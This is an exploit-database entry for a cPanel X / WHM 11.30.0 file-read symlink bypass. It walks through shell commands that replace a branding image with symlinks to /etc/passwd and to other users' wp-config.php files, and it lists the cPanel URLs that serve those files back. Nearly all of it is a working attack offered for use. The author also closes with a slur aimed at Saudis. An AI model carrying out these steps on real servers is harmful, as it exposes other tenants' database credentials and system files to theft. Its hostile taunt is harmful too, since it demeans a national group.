cPanel X / WHM 11.30.0 (build 27) Read Files / Symlinks Bypass

2011-06-11T00:00:00
ID 1337DAY-ID-16304
Type zdt
Reporter ZxH-Labs
Modified 2011-06-11T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # cPanel X / WHM  11.30.0 (build 27) Read Files / Symlinks Bypass !!
# Version : 11.30.0 <Build 27>
# Author : ZxH-Labs
# Date : 1st OF Jun 2011
# Tested On CentOS 
# Software Link : http://www.cpanel.net
# Home: 1337day.com Inj3ct0r Exploit DataBase

[+] Exploiting cPanel x .... 

At First , You Must've Reseller Account < Note : We'll Not Need To 2086 Port :)
Okay Now Open SSH or File Manager Then Go to
  
                                                                             /home/user/cpanelbranding/x3


Note : You Can Change x3 Template To Template That You're Running 
Okay Now Exeute This Command To Delete File And Make Symlink To read it 

# 0x01 : [email protected] [~/cpanelbranding/x3]# rm ui_sprites_bg_snap_to_smallest_width.png
# 0x02 : [email protected] [~/cpanelbranding/x3]# ln -s /etc/passwd ui_sprites_bg_snap_to_smallest_width.png

The Second Will Work Successfuly Without Any Problem'z !
Okay .. Now If You Want to Read Another File .. So You've To Check Files If You can Read it or No 
So .. Execute This Command  :

# 0x021 : [email protected] [~/]# ls -dl /home/*/public_html/ | grep drwxr-xr-x

You'll Get Some Path'z .. So You Can Read it Easily 

# 0x03 : [email protected] [~/cpanelbranding/x3]# ln -s /home/user/public_html/wp-config.php sprites_bg_snap_to_smallest_width.png
Note : /home/user/public_html Must be Chmoded 755 / drwxr-xr-x

[+] Reading Data From cPanel X ...

Okay .. We've Finished The First Part .. Now We Want To Read Files / Symlinks !
Okay Now Go 2 cPanel X 

# 0x01 : http://domain.com/net/..etc:2082
# 0x02 : http://ip:2082
# 0x03 : https://domain.com/net/..etc:2082
# 0x04 : https://ip:2082

Now Show Source And Search About "ui_sprites_bg_snap_to_smallest_width.png" 
You'll See This
"("/cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png");}#ui-aqua-hd-bg{background-position:"
Now Add The Path To Your cPanel To Get File

[+] Full Exploit  of cPanel X ...

Now You'll Open This Link

# 0x01 : http://domain.com/net/..etc:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png
# 0x02 : http://ip:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png
# 0x03 : https://domain.com/net/..etc:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png
# 0x04 : https://ip:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png


[+] Note For All 

We All Have More And More exploits For cPanel X But I Want You 2 Know That All exploit'z Will Not bypass Forbidden .. Only if file has 755 Permission 
However I Hate Lamer'z :) .. Especially Saudi'z Lamer'z !

./b0x-j0

[+] Greet'z 2 All Friend'z and 1337day.com (Inj3ct0r Team)



#  0day.today [2018-01-01]  #